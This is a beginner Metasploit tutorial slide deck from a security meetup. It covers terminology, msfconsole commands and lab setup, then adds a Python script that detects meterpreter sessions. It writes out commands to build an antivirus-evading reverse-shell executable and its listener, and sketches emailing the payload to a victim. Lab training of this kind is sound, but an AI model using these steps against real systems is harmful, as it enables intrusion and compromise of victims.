Arvind Sharma - Metasploit 101 Part 1 -...


Page 1: Arvind Sharma - Metasploit 101 Part 1 - HconGroupsgroups.hcon.in/.../hgd_arvind_sharma_-_metasploit_101__part_1.pdfTopics to be covered • Understanding basic terminologies • Exploiting

PART 1

MSF 101

By -: Arvind Sharma

(Moderator Hcon Delhi)


About Me

• Security Enthusiast

• Works at no-where.com

• Works For Hcon Group & m0rphiz3.org

• Python coder

• Few More I will add in next meet ;)


Topics to be covered

• Understanding basic terminologies

• Exploiting the vulnerability manually

• What is MSF (Metasploit) & why needed

• Brief History and Introduction

• Lab requirements, creation and prerequisites for testing

• Basic Exploitation of Windows XP & Metasploitable

Note: This is not the end, this is just the beginning; details in the next meets


Basic Terminologies

• Vulnerability: Weakness in a system (e.g. buffer overflow, memory leaks, etc.)

• Exploit: Security attack on the vulnerability (e.g. an attacker uses a BOF to execute his own code)

• Payload: Sequence of code that is executed when the vulnerability is triggered

• Shellcodes: Shell payloads which provide an interactive shell to control the compromised system

• Encoder: Software which converts a piece of code into another form

• Auxiliary: Code other than exploits and vulnerabilities

• Session : Successful connection after exploitation


Let's find some vulnerabilities and exploit them manually

• Vulnerable Free Float FTP Server V 1.0 on Windows XP (netapi too)

• Finding a public exploit (I prefer a Python one)

• Crashing the Free Float FTP Server

• Execution of shellcode: yes/no? If no, why?

• Vulnerable ssh on metasploitable 2

• Finding Public Exploit

• Exploiting vulnerable ssh


Place for Finding Public Exploits

http://www.securityfocus.com/

http://www.exploit-db.com/

http://packetstormsecurity.com/

There might be more, but these serve the purpose


Scanning and enumerating the services

Note : Yellow Marked are vulnerable services


Exploiting the vulnerabilities using public exploits


So you saw that working with public exploits creates a hectic situation. Now here comes my SN1P3R

‘THE MSF’


MSF Overview

• Metasploit Framework is an open source framework which provides the following features

• Information Gathering & Fingerprinting

• Exploit Development / Penetration Testing

• Payload creation and Encoding

• Fuzzing (used to test for app vulnerabilities), etc.

• Originally written in Perl by HD Moore for game playing in network testing; afterwards completely ported to Ruby.

• It has been maintained by Rapid7 since 2009

http://www.rapid7.com/products/metasploit/download.jsp


Metasploit Directory Structure

root@bt: cd /pentest/exploits/framework2/

data lib exploits payloads encoders auxiliary

Note: Few more are there but these are important ones


Interfaces provided by MSF

• Console ( root@bt: msfconsole )

• CLI ( msfcli /exploit/windows/smb/ms08_067_netapi )

• Web

• GUI

• Armitage


Demo of Different modes of opening and accessing MSF Console

(On Backtrack 5 R3)

• Using Backtrack Menu

Backtrack -> Exploitation Tools -> Network Exploitation Tools -> Metasploit Framework -> msfconsole

• By navigating to the framework directory

root@bt: cd /pentest/exploits/framework/

root@bt: ./msfconsole

• Directly through terminal

root@bt: msfconsole


Basic Exploitation Technique

Open Port Scan+Version Scan

Open Port and Service Version Disclosure

Exploit the Vulnerability

Get Full Control


Basic Commands of Metasploit Framework

• ? or help -> help menu

• search <keyword> -> for searching modules

• use exploit/[path] -> for using the exploit

• set PAYLOAD [path] -> specifying the payload to be used

• show options -> to show options for the current module

• set [option] [value] -> to set the values required for the module

• exploit -> start the exploit

Few Meterpreter Commands

• shell -> drops you to the shell prompt of the compromised host

• ps -> shows PIDs of running processes

• migrate [pid] -> migrate to a different process

Note: For more commands and their description get the MSF cheat sheet

http://www.sans.org/media/netwars/brochure-netwars-2013.pdf


Using msfpayload and msfencode tools of MSF

• msfpayload -> used for shellcode generation and also for creating executables from Metasploit payloads

Syntax : msfpayload [options] [var=val] <[S]ummary [P]erl…………

example :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 X > Desktop/payload.exe

• msfencode -> another tool in MSF, used for encoding payloads to decrease the detection level

Example :

msfencode -t exe -x Desktop/payload.exe -k -o Desktop/encoded_payload.exe -e x86/shikata_ga_nai 5

Note : More Detail will be in MSF 101 part 2 in next meet


After creating payload what should be done ?

exe payload + compress -> mail to victim -> victim execute -> boom


Creating a Listener for our exe payload

• Open msf and use multi/handler, which is a stub program that handles exploits launched outside of the framework

msf > use exploit/multi/handler

• After using multi/handler we have to tell msf which payload it has to listen for

msf > set PAYLOAD windows/meterpreter/reverse_tcp

msf > show options ( set the LHOST and LPORT )

msf > set LHOST 192.168.0.2

msf > set LPORT 4444

Note : Now your listener is ready for meterpreter session


Lab Requirement and Creation of Lab for testing

Requirement:

1. Virtualization Software ( Virtual Box , Vmware etc )

2. ISO Image of different OS like Windows XP , Backtrack, Metasploitable

3. Your Brain

Creation of Lab in my way :-

• I prefer Virtual Box, why? Because it's free and also takes less space

• For communication between the virtual machines I create an internal network of VMs with a DHCP server on. Thus no need to set IPs manually

• Test things in internal network mode

• How to create DHCP Server and internal network go like this ……

continued………….


Lab Creation



How to defend against and detect a meterpreter session and kill it
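
For the detection topic above, an added example (not from the original deck): it scans `netstat -ano` output for established connections to the LPORT set in the listener slide and maps each owning PID to a process name from `tasklist` output. The sample outputs, the lab host address 192.168.0.5 and the process names are constructed for illustration, and `WATCHED_PORTS` is an assumed watch list.

```python
import csv
import io

# Constructed `netstat -ano` output from a Windows lab host (not real data).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1712
  TCP    192.168.0.5:1039       192.168.0.2:4444       ESTABLISHED     1088
  TCP    192.168.0.5:1041       192.168.0.9:80         ESTABLISHED     2240
  UDP    0.0.0.0:445            *:*                                    4
"""
# Constructed `tasklist /fo csv /nh` output from the same host.
TASKLIST_SAMPLE = '''\
"explorer.exe","1088","Console","0","18,432 K"
"FTPServer.exe","1712","Console","0","3,120 K"
"iexplore.exe","2240","Console","0","22,004 K"
'''
WATCHED_PORTS = {4444}  # LPORT from the slides; an assumption, tune per site

def parse_netstat(text):
    """Yield (remote_host, remote_port, state, pid) for each TCP row."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue  # header, blank lines, UDP rows (no state column)
        host, _, port = parts[2].rpartition(":")
        if port.isdigit() and parts[4].isdigit():
            yield host, int(port), parts[3], int(parts[4])

def parse_tasklist(text):
    """Map PID -> image name from CSV-formatted tasklist output."""
    rows = csv.reader(io.StringIO(text))
    return {int(r[1]): r[0] for r in rows if len(r) > 1 and r[1].isdigit()}

def find_suspect_sessions(netstat_text, tasklist_text, ports=WATCHED_PORTS):
    """Return established connections whose remote port is on the watch list."""
    names = parse_tasklist(tasklist_text)
    hits = []
    for host, port, state, pid in parse_netstat(netstat_text):
        if state == "ESTABLISHED" and port in ports:
            # After `migrate`, the socket owner is the process migrated into,
            # so the image name can look benign (explorer.exe in this sample).
            hits.append({"pid": pid, "image": names.get(pid, "unknown"),
                         "remote": f"{host}:{port}",
                         "kill": f"taskkill /PID {pid} /F"})
    return hits

if __name__ == "__main__":
    print(find_suspect_sessions(NETSTAT_SAMPLE, TASKLIST_SAMPLE))
```

A port match is only a lead, since LPORT is chosen by whoever built the payload; review the process and its parent before running the suggested `taskkill` command.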